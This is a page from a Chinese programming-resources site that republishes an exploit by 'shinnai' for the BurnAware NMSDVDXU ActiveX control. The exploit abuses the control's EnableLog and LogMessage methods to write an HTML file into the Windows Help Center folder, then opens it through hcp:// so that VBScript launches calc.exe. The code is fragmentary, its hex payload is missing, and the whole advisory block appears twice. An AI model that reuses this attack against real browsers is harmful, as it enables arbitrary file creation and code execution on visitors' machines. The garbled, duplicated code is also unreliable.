您现在的位置是:网站首页> 编程资料编程资料
BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution _Exploit_网络安全_
2023-05-24
627人已围观
简介 BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution _Exploit_网络安全_
-----------------------------------------------------------------------------
BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Execution
url: http://www.burnaware.com File: NMSDVDXU.dll <= 1.0.0.13
CLSID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
ProgID: NMSDVDX.DVDEngineX.1
Descr.: DVDEngineX Class Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 myMsinfo is just hexadecimal values of:
-----------------------------------------------------------------------------
unescape("nguage='vbscript") & _
unescape("'> compatUI.Run") & _
unescape("Application 1, "") & _
unescape("calc.exe", 1 ") & _
unescape("script>") test.Initialize True
test.EnableLog "C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm", True
test.LogMessage myMsinfo window.location = "hcp://system/sysinfo/msinfo.htm"
End Sub
BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Execution
url: http://www.burnaware.com File: NMSDVDXU.dll <= 1.0.0.13
CLSID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
ProgID: NMSDVDX.DVDEngineX.1
Descr.: DVDEngineX Class Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 myMsinfo is just hexadecimal values of:
-----------------------------------------------------------------------------
unescape("nguage='vbscript") & _
unescape("'> compatUI.Run") & _
unescape("Application 1, "") & _
unescape("calc.exe", 1 ") & _
unescape("script>") test.Initialize True
test.EnableLog "C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm", True
test.LogMessage myMsinfo window.location = "hcp://system/sysinfo/msinfo.htm"
End Sub
相关内容
- ESET Smart Security 3.0.667.0 Privilege Escalation PoC _Exploit_网络安全_
- EO Video 1.36 Local Heap Overflow DOS / PoC _Exploit_网络安全_
- WS_FTP Home/Professional FTP Client Remote Format String PoC _Exploit_网络安全_
- FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh) _Exploit_网络安全_
- webEdition CMS (we_objectID) Blind SQL Injection Exploit _Exploit_网络安全_
- VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability _Exploit_网络安全_
- Anzio Web Print Object _Exploit_网络安全_
- Ultrastats _Exploit_网络安全_
- Mole Group Real Estate Script _Exploit_网络安全_
- trixbox (langChoice) Local File Inclusion Exploit (connect-back) _Exploit_网络安全_
